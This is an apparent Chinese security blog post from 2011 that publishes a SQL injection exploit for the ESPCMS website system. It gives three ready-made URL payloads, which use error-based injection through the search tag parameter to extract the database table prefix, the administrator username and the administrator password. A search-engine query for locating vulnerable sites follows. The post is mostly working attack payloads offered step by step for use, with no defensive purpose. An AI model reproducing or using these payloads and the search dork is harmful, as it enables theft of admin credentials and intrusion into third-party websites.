espcms最新注入0day

分类:安全 | 2011-12-2 | 撸过 89 次
0人扯谈

上EXP。一步步来。暴出表前缀后,在修改后两句代码里面的表前缀。

爆表前缀:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

暴管理员用户名:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

暴管理员密码:

 index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

百度关键字:

inurl:index.php?ac=article&at=read&did=

 

本站内容均为原创,转载请务必保留署名与链接!
espcms最新注入0day:https://www.webshell.cc/2202.html
标签: ,

相关日志